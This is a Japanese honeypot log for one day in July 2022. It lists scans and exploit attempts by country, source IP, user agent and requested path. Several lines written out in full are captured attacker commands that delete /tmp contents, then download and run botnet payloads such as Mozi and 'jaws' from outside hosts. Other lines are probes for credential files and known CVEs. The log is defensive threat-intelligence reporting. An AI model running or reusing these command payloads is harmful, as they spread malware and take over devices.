ハニーポット(仮) 観測記録 2022/07/15分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget qwugdsabbdsdeeeeb212c.bydthkk.top/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
Location:US
NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
Location:UK
zgrabによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
D-link製品の脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://194.31.98.205/bins/aqua.mpsl; sh /tmp/aqua.mpsl
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:264 (前日比:119)
US:総アクセス数:66 (前日比:-34)
UK:総アクセス数:59 (前日比:-5)
SG:総アクセス数:102 (前日比:25)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
6 | 20.200.214.205 | United States |
1 | 20.219.71.125 | United States |
2 | 37.0.8.116 | Netherlands |
1 | 40.122.73.20 | United States |
3 | 45.61.186.139 | United States |
1 | 45.143.200.118 | Russia |
1 | 51.142.79.1 | United Kingdom |
9 | 54.255.233.232 | United States |
1 | 94.232.40.91 | Russia |
1 | 94.232.44.25 | Russia |
1 | 94.232.44.68 | Russia |
16 | 95.214.235.205 | Ukraine |
1 | 104.37.190.250 | United States |
1 | 106.53.71.128 | China |
1 | 107.130.226.91 | United States |
2 | 109.237.103.9 | Russia |
1 | 120.85.113.46 | China |
1 | 128.14.133.58 | United States |
7 | 128.199.45.47 | United Kingdom |
10 | 135.125.217.54 | France |
7 | 135.125.246.110 | France |
63 | 157.245.157.31 | United States |
1 | 162.55.239.46 | Germany |
1 | 172.245.10.76 | United States |
63 | 178.128.90.21 | United States |
2 | 179.43.142.166 | Panama |
1 | 183.136.225.35 | China |
15 | 185.7.214.104 | Hong Kong |
38 | 185.130.224.43 | Netherlands |
1 | 188.112.145.41 | Latvia |
1 | 188.166.8.119 | United States |
3 | 193.56.29.120 | United Kingdom |
1 | 198.235.24.26 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
1 | Go-http-client/1.1 |
2 | Hello, world |
63 | Mozilla/5.0 (Linux i386; X11) Gecko/20061206 Firefox/24.0 |
6 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 |
63 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.8 (KHTML, like Gecko) Chrome/28.0.1141.44 Safari/535.25 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/74.0.3729.121 Mobile/15E148 Safari/605.1 |
9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | Python/3.7 aiohttp/3.7.4.post0 |
36 | curl/7.54.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
4 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
42 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
2 | GET | /.local |
HTTP/1.1 |
2 | GET | /.production |
HTTP/1.1 |
2 | GET | /.remote |
HTTP/1.1 |
2 | GET | //admin/.env |
HTTP/1.1 |
2 | GET | //administrator/.env |
HTTP/1.1 |
2 | GET | //api/.env |
HTTP/1.1 |
2 | GET | //app/.env |
HTTP/1.1 |
2 | GET | //apps/.env |
HTTP/1.1 |
2 | GET | //assets/.env |
HTTP/1.1 |
2 | GET | //config/.env |
HTTP/1.1 |
2 | GET | //core/.env |
HTTP/1.1 |
2 | GET | //core/Datavase/.env |
HTTP/1.1 |
2 | GET | //core/app/.env |
HTTP/1.1 |
2 | GET | //cron/.env |
HTTP/1.1 |
2 | GET | //cronlab/.env |
HTTP/1.1 |
2 | GET | //database/.env |
HTTP/1.1 |
2 | GET | //en/.env |
HTTP/1.1 |
2 | GET | //exapi/.env |
HTTP/1.1 |
2 | GET | //lab/.env |
HTTP/1.1 |
2 | GET | //laravel/.env |
HTTP/1.1 |
2 | GET | //lib/.env |
HTTP/1.1 |
2 | GET | //psnlink/.env |
HTTP/1.1 |
2 | GET | //public/.env |
HTTP/1.1 |
2 | GET | //saas/.env |
HTTP/1.1 |
2 | GET | //site/.env |
HTTP/1.1 |
2 | GET | //sitemaps/.env |
HTTP/1.1 |
2 | GET | //tools/.env |
HTTP/1.1 |
2 | GET | //uploads/.env |
HTTP/1.1 |
2 | GET | //v1/.env |
HTTP/1.1 |
2 | GET | //v2/.env |
HTTP/1.1 |
2 | GET | //vendor/.env |
HTTP/1.1 |
2 | GET | //web/.env |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /HNAP1/ |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /YzY0 |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin.php |
HTTP/1.1 |
1 | GET | /admin.shtml |
HTTP/1.1 |
1 | GET | /aws.yml |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /config.js |
HTTP/1.1 |
1 | GET | /config/aws.yml |
HTTP/1.1 |
3 | GET | /config/getuser?index=0 |
HTTP/1.1 |
2 | GET | /console/ |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | /default.cgi |
HTTP/1.1 |
1 | GET | /default.pl |
HTTP/1.1 |
1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /index.aspx |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /index.pl |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /info |
HTTP/1.1 |
1 | GET | /inicio.cgi |
HTTP/1.1 |
1 | GET | /inicio.html |
HTTP/1.1 |
1 | GET | /inicio.shtml |
HTTP/1.1 |
1 | GET | /js/core.js |
HTTP/1.1 |
1 | GET | /main.jhtml |
HTTP/1.1 |
1 | GET | /main.php |
HTTP/1.1 |
1 | GET | /menu.cgi |
HTTP/1.1 |
1 | GET | /menu.shtml |
HTTP/1.1 |
1 | GET | /nmaplowercheck1657813329 |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
2 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /readme.txt |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /start.asp |
HTTP/1.1 |
1 | GET | /start.aspx |
HTTP/1.1 |
1 | GET | /start.php |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
2 | HEAD | / |
HTTP/1.1 |
2 | POST | //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //lib/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //lib/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //lib/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //vendor/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //vendor/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 18.188.98.63 | United States |
1 | 20.96.9.92 | United States |
3 | 37.0.8.116 | Netherlands |
1 | 37.0.8.162 | Netherlands |
1 | 37.0.8.217 | Netherlands |
4 | 45.61.186.139 | United States |
1 | 45.143.200.118 | Russia |
8 | 51.79.29.48 | Canada |
1 | 64.62.197.11 | United States |
1 | 66.240.205.34 | United States |
1 | 94.232.40.91 | Russia |
1 | 94.232.44.25 | Russia |
1 | 94.232.44.68 | Russia |
1 | 95.241.78.103 | Italy |
2 | 109.237.103.9 | Russia |
1 | 128.14.134.170 | United States |
7 | 128.199.20.240 | United Kingdom |
1 | 162.55.239.46 | Germany |
1 | 162.142.125.7 | United States |
1 | 165.227.215.87 | United States |
1 | 167.248.133.120 | United States |
15 | 185.7.214.104 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 205.210.31.10 | United States |
1 | 205.210.31.152 | United States |
1 | 223.149.250.193 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 |
19 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | VLC/3.0.8 LibVLC/3.0.8 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
4 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
20 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
4 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /js/core.js |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 2.57.122.80 | Romania |
2 | 37.0.8.116 | Netherlands |
1 | 37.0.8.162 | Netherlands |
1 | 37.0.8.217 | Netherlands |
5 | 45.61.186.139 | United States |
1 | 45.143.200.118 | Russia |
1 | 49.143.32.6 | South Korea |
1 | 64.62.197.5 | United States |
1 | 66.240.192.82 | United States |
1 | 94.232.40.91 | Russia |
1 | 94.232.44.25 | Russia |
1 | 94.232.44.68 | Russia |
1 | 104.37.190.250 | United States |
1 | 104.129.48.126 | United States |
2 | 109.237.103.9 | Russia |
1 | 128.14.209.162 | United States |
1 | 162.55.239.46 | Germany |
1 | 175.100.20.235 | Cambodia |
7 | 178.62.212.160 | United States |
18 | 185.7.214.104 | Hong Kong |
4 | 185.165.190.17 | Seychelles |
1 | 185.196.220.81 | Netherlands |
1 | 188.166.8.119 | United States |
1 | 198.235.24.14 | United States |
1 | 210.19.34.146 | Malaysia |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
1 | Go-http-client/1.1 |
1 | Hello, World |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 |
4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
5 | GET | /.env |
HTTP/1.1 |
1 | GET | /.sendgrid |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
5 | GET | /config/getuser?index=0 |
HTTP/1.1 |
2 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /js/core.js |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sendgrid.env |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | /robots.txt |
HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
5 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 37.0.8.116 | Netherlands |
1 | 37.0.8.162 | Netherlands |
1 | 39.172.105.219 | China |
3 | 45.61.186.139 | United States |
12 | 51.79.29.48 | Canada |
1 | 64.62.197.137 | United States |
1 | 66.240.192.82 | United States |
1 | 94.232.40.91 | Russia |
1 | 94.232.44.25 | Russia |
1 | 94.232.44.68 | Russia |
2 | 103.136.40.141 | India |
1 | 104.37.190.250 | United States |
2 | 109.237.103.9 | Russia |
1 | 111.43.114.50 | China |
1 | 113.116.131.213 | China |
1 | 120.253.79.235 | China |
1 | 128.14.134.170 | United States |
7 | 142.93.209.9 | United States |
1 | 147.124.213.130 | United States |
1 | 162.55.239.46 | Germany |
1 | 162.142.125.211 | United States |
1 | 163.47.221.19 | New Zealand |
1 | 172.104.138.223 | United States |
1 | 175.107.13.123 | Pakistan |
2 | 179.43.155.171 | Panama |
16 | 185.7.214.104 | Hong Kong |
23 | 185.130.224.43 | Netherlands |
8 | 185.254.196.223 | Ukraine |
1 | 188.165.87.105 | France |
1 | 193.118.53.194 | United States |
1 | 193.118.53.210 | United States |
1 | 197.41.93.155 | Egypt |
1 | 205.210.31.15 | United States |
1 | 209.127.186.210 | Canada |
UserAgent一覧
件数 | UserAgent |
---|---|
26 | - |
2 | Abcd |
1 | Go-http-client/1.1 |
1 | Hakai/2.0 |
2 | Hello, World |
3 | Hello, world |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (iPhone; CPU OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/28.0 Mobile/15E148 Safari/605.1.15 |
1 | Mozilla/5.0 zgrab/0.x |
1 | VLC/3.0.8 LibVLC/3.0.8 |
6 | curl/7.54.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
3 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
16 | \x16\x03\x01\x02 |
||
3 | \x16\x03\x01 |
||
24 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
3 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
3 | GET | /config/getuser?index=0 |
HTTP/1.1 |
2 | GET | /console/ |
HTTP/1.1 |
